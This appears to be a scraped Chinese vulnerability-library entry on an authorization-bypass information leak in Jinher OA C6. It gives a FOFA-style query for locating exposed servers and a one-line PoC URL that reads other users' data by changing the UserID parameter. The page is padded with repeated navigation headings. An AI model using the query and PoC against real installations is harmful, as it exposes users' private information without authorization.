金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

漏洞描述

金和OA C6 存在越权信息泄露漏洞，普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息

漏洞影响

金和OA C6

网络测绘

app="Jinher-OA"

漏洞复现

使用普通用户登录 OA应用后台

访问的POC为

plain

http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330

注意 RY120330 需要为确定的其他的用户编号

泄露了部分的敏感信息

CMS漏洞

images

OA产品漏洞

images

Web应用漏洞

images

base

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

中间件漏洞

images

云安全漏洞

images

人工智能漏洞

images

其他漏洞

images

开发框架漏洞

images

开发语言漏洞

images

操作系统漏洞

images

数据库漏洞

images

网络设备漏洞

images

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

images

images

images

grafana

11.0.0

ollama

0.1.33

0.1.45

0.3.14

images

images

images

images

images

images

images

images

images

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞 ​

漏洞描述 ​

漏洞影响 ​

网络测绘 ​

漏洞复现 ​

金和OA C6 DossierBaseInfoView.aspx 后台越权信息泄露漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现